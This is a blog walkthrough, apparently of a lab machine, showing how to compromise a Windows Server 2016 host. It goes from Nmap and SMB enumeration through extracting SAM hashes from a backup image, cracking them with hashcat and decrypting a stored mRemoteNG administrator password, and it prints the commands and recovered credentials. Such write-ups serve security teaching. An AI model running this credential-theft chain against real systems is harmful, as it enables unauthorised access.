What Do You Know About Plaintext passwords?

I recently got permission to hack a computer. Never one to shy away from a challenge, I set to the task and got in in under an hour! It was a fairly straightforward process so here we go:

I started with an NMap scan of the machine and discovered that SSH and SMB ports were open. Also we now know this is a Windows Sever 2016 box.

22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds

I may have had permission but I didn’t have credentials so I tried SMB.

Sharename Type Comment

--------- ---- -------

ADMIN$ Disk Remote Admin

Backups Disk

C$ Disk Default share

IPC$ IPC Remote IPC

Without credentials I can’t touch any of these shares except Backups. It contained this folder of backup images:

WindowsImageBackup D 0 Wed Jun 12 08:10:15 2019

I mounted the largest VHD file in the directory and spent some time looking through it for more info. Eventually I decided to take the SAM and SYSTEM files to see if I could get some credentials.

%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\System32\config\SYSTEM

I started by dumping the hashes in those files:

samdump2 ./SYSTEM ./SAM

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Though the default Administrator account is disabled and appears to be blank, the other account looks promising so I used HashCat to try to crack its password.

.\hashcat64.exe -m1000 .\hash.txt .\rockyou.txt

Bingo! HashCat says the password is bureaulampje

I then try to SSH to the machine using this account.

ssh L4mpje@10.10.10.134

Microsoft Windows [Version 10.0.14393]

(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>

Awesome - I have credentials and I’m logged in. Looking around I notice mRemoteNG is installed. This makes my job pretty easy because this program doesn’t store passwords securely by default though there is an option to encrypt the connection file. I find L4mpje’s mRemoteNB connection file and it’s using the default configuration so it’s not encrypted entirely.

Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP"

Clearly this is not a plain text password, it’s either encoded or hashed. Fortunately I also find a python script on Github that decrypts this password.

The script runs and spits out the administrator’s password: thXLHM96BeKL0ER2

I have the administrator’s password! Consider this machine hacked.

It is a strong password at 16 digits long and though none of the passwords I found were stored in plain text, they were not difficult to crack. Difficulty to crack is an important consideration when it comes to selecting passwords. Check out our blog on password strengths for tips on creating passwords that are difficult to crack! Not only do you need to choose passwords that are very difficult to crack but you should also give every service is a different password so compromising one service doesn’t compromise them all.

SecurityLARG*netinfosec, netsecComment